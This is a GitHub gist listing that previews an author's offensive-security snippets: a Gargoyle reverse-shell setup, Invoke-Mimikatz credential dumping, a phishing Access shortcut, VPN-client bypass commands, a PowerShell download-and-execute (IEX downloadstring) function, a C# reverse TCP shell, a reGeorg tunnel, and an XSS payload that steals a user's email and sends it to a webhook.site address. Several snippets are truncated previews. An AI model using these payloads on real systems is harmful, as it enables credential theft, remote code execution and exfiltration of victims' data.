Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View adon90's full-sized avatar

aDoN adon90

158 followers · 21 following
  • Spain
View GitHub Profile
@adon90
adon90 / setup.nasm
Last active May 18, 2018 09:56
Gargoyle setup.nasm to execute a reverse shell instead of messagebox
BITS 32
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1
@adon90
adon90 / mimikatz.ps1
Last active May 29, 2018 10:41
PowerShell Shellcode Injection fix on Win 10 (v1803)
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
@adon90
adon90 / Database3.accde
Last active July 4, 2018 13:08
Phishing Access Macroless .MAM Extension
------Database Shortcut--------
[Shortcut Properties]
AccessShortcutVersion=1
DatabaseName=Database3.accdb
ObjectName=pwnid
ObjectType=Macro
Computer=W10PTTEST
DatabasePath=http://IP/Database3.accde
EnableRemote=0
CreationTime= 1d4138fe237a9fc
@adon90
adon90 / bypassvpn.txt
Last active July 10, 2018 08:07
Bypass VPN Number of Clients
HOST
openvpn adon901.ovpn
COMPUTER 1
sshuttle -vr root@HOST 10.10.0.0/8
COMPUTER 2
sshuttle -vr root@HOST 10.10.0.0/8
HOST:
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
@adon90
adon90 / runas-cabesha-webdelivery
Last active July 17, 2018 10:18
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
}
@adon90
adon90 / ReverseC#TCP
Last active September 30, 2018 14:51
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
{
@adon90
adon90 / VulnerableDotNetHTTPRemoting.cs
Created March 20, 2019 17:24
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
@adon90
adon90 / Frida
Created October 29, 2018 13:11
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
@adon90
adon90 / re.py
Last active September 19, 2019 07:39
reGeorg with Cookie
# 保存为 re.py ,然后 re.py -u http://xx.com/tunnel.aspx -p 8080 -s "PHPSESSIONID: xxxxxxxxxxxxxxxxxx"
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
@adon90
adon90 / leak.js
Created October 9, 2019 14:58
Perfect XSS Extraction + Information Leak
<script>
var req = new XMLHttpRequest();
req.onload = function () {
var patt2 = /OA_mail":\["([^"]*?)"/g;
var result = patt2.exec(req.responseText)[1];
new Image().src = ("http://webhook.site/f6dab550-defa-4310-9a79-d0c5c1e9fdcc/?cc="+result);
};
req.open("GET", "/api/dataUsers/v1/WebStore/getUser", true);
req.send();
</script>